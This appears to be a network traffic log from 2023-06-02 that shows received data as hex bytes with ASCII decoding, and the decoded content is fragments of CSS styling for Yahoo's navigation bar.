                                                                                                                                                                        2023-06-02 11:13:21 UTC261INData Raw: 68 65 69 67 68 74 3a 32 34 70 78 7d 2e 5f 79 62 5f 31 65 75 70 39 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 36 37 37 70 78 3b 77 69 64 74 68 3a 33 32 70 78 3b 68 65 69 67 68 74 3a 33 36 70 78 7d 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 31 77 39 79 73 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 66 79 66 65 6e 20 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 64 61 70 79 71 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 61 34 73 33 30 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 68 6f 6d 65 70 61 67 65 20 2e 5f 79 62 5f 64 61 70 79 71 2c 2e 79 62 61 72 2d
                                                                                                                                                                        Data Ascii: height:24px}._yb_1eup9{background-position:0 -1677px;width:32px;height:36px}.ybar-light ._yb_1w9ys,.ybar-light ._yb_fyfen ._yb_llqm3,.ybar-light ._yb_dapyq,.ybar-light ._yb_a4s30,.ybar-light ._yb_llqm3,.ybar-light .ybar-property-homepage ._yb_dapyq,.ybar-
                                                                                                                                                                        2023-06-02 11:13:21 UTC261INData Raw: 30 20 2d 31 36 33 38 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78 7d 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 68 6f 6d 65 70 61 67 65 20 2e 5f 79 62 5f 64 61 70 79 71 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 35 32 34 70 78 3b 77 69 64 74 68 3a 32 37 70 78 3b 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 39 67 76 74 7a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 35 34 39 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 36 70 78 7d 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 39 67 76 74 7a 7b 62 61 63 6b
                                                                                                                                                                        Data Ascii: 0 -1638px;width:24px;height:24px}.ybar-light .ybar-property-homepage ._yb_dapyq{background-position:0 -1524px;width:27px;height:20px}.ybar-light ._yb_9gvtz{background-position:0 -1549px;width:24px;height:26px}.ybar-light .ybar-ytheme-fuji2 ._yb_9gvtz{back
                                                                                                                                                                        2023-06-02 11:13:21 UTC263INData Raw: 6e 72 6b 67 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 39 39 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 76 6d 30 66 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 32 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 35 32 34 62 77 2c 2e 5f 79 62 5f 67 69 7a 65 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 36 35 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 33 72 35 73 2c 2e 5f 79 62 5f 71 66 35 78 30 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 36 36 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b
                                                                                                                                                                        Data Ascii: nrkgp{background-position:0 -99px;width:28px;height:28px}._yb_1vm0f{background-position:0 -132px;width:28px;height:28px}._yb_524bw,._yb_gizet{background-position:0 -165px;width:28px;height:28px}._yb_13r5s,._yb_qf5x0{background-position:0 -66px;width:28px;
                                                                                                                                                                        2023-06-02 11:13:21 UTC264INData Raw: 78 7d 2e 5f 79 62 5f 64 77 79 71 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 36 36 30 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 6a 73 69 6d 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 36 39 33 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 77 75 31 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 37 32 36 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 31 6f 71 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 37 35 39 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e
                                                                                                                                                                        Data Ascii: x}._yb_dwyqm{background-position:0 -660px;width:28px;height:28px}._yb_jsimk{background-position:0 -693px;width:28px;height:28px}._yb_1wu1p{background-position:0 -726px;width:28px;height:28px}._yb_11oqw{background-position:0 -759px;width:28px;height:28px}.
                                                                                                                                                                        2023-06-02 11:13:21 UTC265INData Raw: 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 2c 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 2c 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 32 64 70 70 78 29 7b 2e 5f 79 62 5f 31 77 39 79 73 2c 2e 5f 79 62 5f 66 79 66 65 6e 20 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 5f 79 62 5f 64 61 70 79 71 2c 2e 5f 79 62 5f 61 34 73 33 30 2c 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 5f 79 62 5f 39 67 76 74 7a 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 39 67 76 74 7a 2c 2e 5f 79 62 5f 70 72 77 6e 72 2c 2e 5f 79 62 5f 6e 74 39 63 77 2c 2e 5f 79 62 5f 65 6e 31 62 64 2c 2e 5f 79 62 5f 31 67 6c 72 67 2c 2e 5f 79 62 5f 38 62 38
                                                                                                                                                                        Data Ascii: e-pixel-ratio:2),only screen and (min-resolution:192dpi),only screen and (min-resolution:2dppx){._yb_1w9ys,._yb_fyfen ._yb_llqm3,._yb_dapyq,._yb_a4s30,._yb_llqm3,._yb_9gvtz,.ybar-ytheme-fuji2 ._yb_9gvtz,._yb_prwnr,._yb_nt9cw,._yb_en1bd,._yb_1glrg,._yb_8b8
                                                                                                                                                                        2023-06-02 11:13:21 UTC266INData Raw: 68 3a 33 32 70 78 3b 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 5f 79 62 5f 70 72 77 6e 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 35 31 32 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 68 65 69 67 68 74 3a 32 34 70 78 7d 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 31 77 39 79 73 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 66 79 66 65 6e 20 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 64 61 70 79 71 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 61 34 73 33 30 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 5f 79 62 5f 6c 6c 71 6d 33 2c 2e 79 62 61 72 2d 6c 69 67 68 74 20 2e 79 62 61 72 2d 70 72 6f 70 65 72 74 79 2d 68 6f 6d 65 70 61 67 65 20 2e 5f 79 62 5f 64 61 70 79 71
                                                                                                                                                                        Data Ascii: h:32px;height:32px}._yb_prwnr{background-position:0 -1512px;width:24px;height:24px}.ybar-light ._yb_1w9ys,.ybar-light ._yb_fyfen ._yb_llqm3,.ybar-light ._yb_dapyq,.ybar-light ._yb_a4s30,.ybar-light ._yb_llqm3,.ybar-light .ybar-property-homepage ._yb_dapyq
                                                                                                                                                                        2023-06-02 11:13:21 UTC268INData Raw: 30 20 2d 31 32 38 35 70 78 3b 77 69 64 74 68 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 7d 2e 5f 79 62 5f 68 79 61 74 7a 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 30 38 70 78 3b 77 69 64 74 68 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 5f 79 62 5f 6e 33 63 79 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 32 39 70 78 3b 77 69 64 74 68 3a 31 32 70 78 3b 68 65 69 67 68 74 3a 31 32 70 78 7d 2e 5f 79 62 5f 31 34 62 73 31 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 33 34 36 70 78 3b 77 69 64 74 68 3a 31 32 70 78 3b 68 65 69 67 68 74 3a 31 32 70 78 7d 2e 5f 79 62 5f 34 38 6d 69 67 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e
                                                                                                                                                                        Data Ascii: 0 -1285px;width:18px;height:18px}._yb_hyatz{background-position:0 -1308px;width:18px;height:16px}._yb_n3cyp{background-position:0 -1329px;width:12px;height:12px}._yb_14bs1{background-position:0 -1346px;width:12px;height:12px}._yb_48mig{background-position
                                                                                                                                                                        2023-06-02 11:13:21 UTC269INData Raw: 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 70 32 77 37 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 33 33 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 72 62 7a 37 78 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 31 39 38 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 37 75 79 77 78 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 67 33 6f 6f 71 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 32 39 37 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e
                                                                                                                                                                        Data Ascii: ht:28px}._yb_1p2w7{background-position:0 -33px;width:28px;height:28px}._yb_rbz7x{background-position:0 -198px;width:28px;height:28px}._yb_7uywx{background-position:0 0;width:28px;height:28px}._yb_g3ooq{background-position:0 -297px;width:28px;height:28px}.
                                                                                                                                                                        2023-06-02 11:13:21 UTC270INData Raw: 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 79 73 71 35 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 38 35 38 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 72 70 39 62 68 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 38 39 31 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 31 73 64 74 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 39 32 34 70 78 3b 77 69 64 74 68 3a 32 38 70 78 3b 68 65 69 67 68 74 3a 32 38 70 78 7d 2e 5f 79 62 5f 67 32 6c 71 36 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 2d 39 35 37 70 78 3b 77
                                                                                                                                                                        Data Ascii: x;width:28px;height:28px}._yb_1ysq5{background-position:0 -858px;width:28px;height:28px}._yb_rp9bh{background-position:0 -891px;width:28px;height:28px}._yb_1sdt6{background-position:0 -924px;width:28px;height:28px}._yb_g2lq6{background-position:0 -957px;w
                                                                                                                                                                        2023-06-02 11:13:21 UTC271INData Raw: 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 79 62 2d 66 75 6a 69 32 2d 66 6f 6e 74 29 3b 6c 65 66 74 3a 63 61 6c 63 28 30 70 78 20 2d 20 76 61 72 28 2d 2d 66 72 61 6d 65 2d 77 69 64 74 68 29 29 3b 6d 61 72 67 69 6e 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 66 72 61 6d 65 2d 77 69 64 74 68 29 3b 7a 2d 69 6e 64 65 78 3a 31 30 30 3b 6f 76 65 72 66 6c 6f 77 3a 73 63 72 6f 6c 6c 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 62 62 5f 66 6f 6f 74 65 72
                                                                                                                                                                        Data Ascii: Helvetica Neue',Helvetica,Arial,sans-serif;font-family:var(--yb-fuji2-font);left:calc(0px - var(--frame-width));margin:0;position:fixed;top:0;width:var(--frame-width);z-index:100;overflow:scroll}._yb_1o7ab *{box-sizing:border-box}._yb_1o7ab ._yb_bb_footer
                                                                                                                                                                        2023-06-02 11:13:21 UTC272INData Raw: 62 5f 31 37 31 79 6b 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 3b 70 61 64 64 69 6e 67 3a 30 20 32 30 70 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 66 72 61 6d 65 2d 77 69 64 74 68 29 7d 2e 5f 79 62 5f 72 61 37 78 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 32 30 70 78 20 31 32 70 78 20 30 3b 67 61 70 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 3b 6d 61 72 67 69 6e 3a 30 3b 7a 2d 69 6e 64 65
                                                                                                                                                                        Data Ascii: b_171yk{display:flex;flex-direction:column;align-items:flex-start;padding:0 20px;width:var(--frame-width)}._yb_ra7xs{display:flex;flex-direction:row;align-items:center;padding:12px 20px 12px 0;gap:10px;color:#232a31;color:var(--yb-batcave);margin:0;z-inde
                                                                                                                                                                        2023-06-02 11:13:21 UTC274INData Raw: 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 2e 5f 79 62 5f 32 38 66 76 67 20 73 76 67 3a 6c 61 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 7d 2e 5f 79 62 5f 79 71 6a 6d 6c 20 2e 5f 79 62 5f 31 35 61 77 33 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73 74 61 72 74 7d 2e 5f 79 62 5f 31 79 6f 6d 6d 20 2e 5f 79 62 5f 31 35 61 77 33 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 5f 79 62 5f 31 71 37 7a 73 7b 68 65 69 67 68 74 3a 32 30 70 78 7d 2e 5f 79 62 5f 31 76 6d 73 6e 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a
                                                                                                                                                                        Data Ascii: rm:rotate(180deg)}._yb_28fvg svg:last-child{margin-top:4px}._yb_yqjml ._yb_15aw3{display:flex;flex-direction:column;align-items:flex-start}._yb_1yomm ._yb_15aw3{display:none}._yb_1q7zs{height:20px}._yb_1vmsn{display:flex;flex-direction:column;align-items:
                                                                                                                                                                        2023-06-02 11:13:21 UTC275INData Raw: 79 62 5f 66 66 77 39 63 2c 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 32 38 66 76 67 7b 77 69 64 74 68 3a 32 37 31 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 63 6f 6c 6f 72 3a 23 35 62 36 33 36 61 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 74 6c 65 73 68 69 70 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 38 66 61 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 6d 61 72 73 68 6d 61 6c 6c 6f 77 29 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 32 38 66 76 67 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 67 61 70 3a 31 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70
                                                                                                                                                                        Data Ascii: yb_ffw9c,._yb_1o7ab ._yb_28fvg{width:271px;padding:12px;font-size:14px;color:#5b636a;color:var(--yb-battleship);background-color:#f5f8fa;background-color:var(--yb-marshmallow)}._yb_1o7ab ._yb_28fvg{display:flex;flex-direction:row;gap:12px;border-radius:4p
                                                                                                                                                                        2023-06-02 11:13:21 UTC276INData Raw: 7a 65 3a 31 31 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 74 61 6c 69 63 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 70 78 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 79 38 6b 35 65 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 79 38 6b 35 65 20 61 20 2e 5f 79 62 5f 31 30 65 6d 6e 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 63 6f 6c 6f 72 3a 23 32 33 32 61 33 31 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 62 61 74 63 61 76 65 29 7d 2e 5f 79 62 5f 31 6f 37 61 62 20 2e 5f 79 62 5f 7a 6d 67 75 68 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 66 6c 65 78 2d 73
                                                                                                                                                                        Data Ascii: ze:11px;line-height:16px;font-style:italic;font-weight:400;margin-left:2px}._yb_1o7ab ._yb_y8k5e{border-radius:4px;width:100%}._yb_1o7ab ._yb_y8k5e a ._yb_10emn{font-weight:600;color:#232a31;color:var(--yb-batcave)}._yb_1o7ab ._yb_zmguh{align-items:flex-s
                                                                                                                                                                        2023-06-02 11:13:21 UTC277INData Raw: 69 64 74 68 29 29 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 34 70 78 20 31 36 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 32 30 25 29 2c 30 20 30 20 32 70 78 20 30 20 72 67 62 28 30 20 30 20 30 2f 35 25 29 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 39 71 65 31 75 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 63 61 6c 63 28 30 70 78 20 2d 20 33 31 31 70 78 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 63 61 6c 63 28 30 70 78 20 2d 20 76 61 72 28 2d 2d 66 72 61 6d 65 2d 77 69 64 74 68 2d 75 68 33 29 29 29 7d 2e 5f 79
                                                                                                                                                                        Data Ascii: idth)));box-shadow:0 4px 16px 0 rgb(0 0 0/20%),0 0 2px 0 rgb(0 0 0/5%);visibility:visible!important;display:block!important}.ybar-ytheme-crunch ._yb_9qe1u{transform:translateX(calc(0px - 311px));transform:translateX(calc(0px - var(--frame-width-uh3)))}._y
                                                                                                                                                                        2023-06-02 11:13:21 UTC279INData Raw: 38 66 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 6e 67 39 63 2e 5f 79 62 5f 72 70 79 38 66 2c 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 62 35 71 76 32 2e 5f 79 62 5f 72 70 79 38 66 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 36 70 78 3b 6d 61 78 2d 68 65 69 67 68 74 3a 35 36 70 78 7d 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 65 37 72 65 2e 5f 79 62 5f 72 70 79 38 66 7b 77 69 64 74 68 3a 61 75 74 6f 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 30 70 78 7d 2e 5f 79 62 5f 72 70 79 38 66 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 2d 6f 66 66 73 65 74 3a 32 70 78 7d 2e 5f 79 62 5f 7a 79 71 39 68 7b 61 6c 69 67 6e 2d 73 65 6c 66
                                                                                                                                                                        Data Ascii: 8f{max-height:32px}.ybar-ytheme-fuji2 ._yb_1ng9c._yb_rpy8f,.ybar-ytheme-fuji2 ._yb_b5qv2._yb_rpy8f{margin-top:6px;max-height:56px}}.ybar-ytheme-fuji2 ._yb_1e7re._yb_rpy8f{width:auto;max-height:40px}._yb_rpy8f:focus{outline-offset:2px}._yb_zyq9h{align-self
                                                                                                                                                                        2023-06-02 11:13:21 UTC280INData Raw: 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 2e 79 62 61 72 2d 64 61 72 6b 20 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 72 70 79 38 66 20 70 61 74 68 7b 66 69 6c 6c 3a 23 66 66 66 3b 66 69 6c 6c 3a 76 61 72 28 2d 2d 79 62 2d 77 68 69 74 65 29 7d 0a 0a 2e 5f 79 62 5f 6c 76 62 69 63 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 68 65 69 67 68 74 3a 34 36 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 36 34 36 70 78 3b 77 69 64 74 68 3a 63 61 6c 63 28 31 30 30 25 20 2d 20 31 32 30 70 78 29 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 63 72 75 6e 63 68 20 2e 5f 79 62 5f 6c 76 62 69 63 7b 74 6f 70 3a 35 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 75
                                                                                                                                                                        Data Ascii: rflow:hidden}.ybar-dark .ybar-ytheme-crunch ._yb_rpy8f path{fill:#fff;fill:var(--yb-white)}._yb_lvbic{display:flex;height:46px;max-width:646px;width:calc(100% - 120px);margin-left:35px;position:relative}.ybar-ytheme-crunch ._yb_lvbic{top:5px;max-width:u
                                                                                                                                                                        2023-06-02 11:13:21 UTC281INData Raw: 20 30 20 30 20 32 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 30 62 30 62 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 59 61 68 6f 6f 53 61 6e 73 20 56 46 27 2c 59 61 68 6f 6f 53 61 6e 73 2c 27 59 61 68 6f 6f 20 53 61 6e 73 27 2c 27 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 27 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 79 62 2d 66 75 6a 69 32 2d 66 6f 6e 74 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 5f 79 62 5f 31 64 78 64 62 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 33 73 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 5f 79 62 5f 31
                                                                                                                                                                        Data Ascii: 0 0 2px;border:1px solid #b0b0b0;font-family:'YahooSans VF',YahooSans,'Yahoo Sans','Helvetica Neue',Helvetica,Arial,sans-serif;font-family:var(--yb-fuji2-font);animation-name:_yb_1dxdb;animation-delay:2s;animation-duration:3s;-webkit-animation-name:_yb_1
                                                                                                                                                                        2023-06-02 11:13:21 UTC283INData Raw: 2e 5f 79 62 5f 31 6b 78 32 64 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 3a 2d 6d 6f 7a 2d 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 37 38 37 36 37 39 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 63 6f 6c 6f 72 2d 61 31 31 79 2d 67 72 61 79 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 5f 79 62 5f 31 6b 78 32 64 3a 3a 70 6c 61 63 65 68 6f 6c 64 65 72 7b 63 6f 6c 6f 72 3a 23 37 38 37 36 37 39 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 79 62 2d 63 6f 6c 6f 72 2d 61 31 31 79 2d 67 72 61 79 29 7d 2e 79 62 61 72 2d 79 74 68 65 6d 65 2d 66 75 6a 69 32 20 2e 79 62 61 72 2d 65 6e 61 62 6c
                                                                                                                                                                        Data Ascii: ._yb_1kx2d::placeholder{color:transparent}.ybar-ytheme-fuji2 ._yb_1kx2d::-moz-placeholder{color:#787679;color:var(--yb-color-a11y-gray)}.ybar-ytheme-fuji2 ._yb_1kx2d::placeholder{color:#787679;color:var(--yb-color-a11y-gray)}.ybar-ytheme-fuji2 .ybar-enabl
